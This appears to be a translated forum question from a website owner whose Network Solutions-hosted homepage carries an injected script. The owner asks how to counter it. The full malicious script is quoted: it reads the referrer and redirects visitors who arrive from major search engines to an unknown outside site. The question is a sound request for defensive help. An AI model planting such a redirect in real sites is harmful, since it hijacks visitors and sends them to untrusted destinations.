我的问题:如何通过重定向用户来缓解插入的“脚本”?
情况: 我的朋友有一个由Network Solutions托管的网站。最近出现了一个脚本,它被插入到用户请求主页时收到的DOM文件的顶部。 该脚本重定向从Yahoo,Google,Bing和AOL域导航的用户。重定向发送到我们从未听说过的网站。
条件: Network Solutions帐户不允许直接访问任何服务器代码。我们只能使用允许html插入的GUI工具。
下面是恶意脚本:
<script>
var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
{
self.location='http://www.pickredbag.com/';
}
</script>
此脚本显示在!Doctype标记上方,我无法将其删除。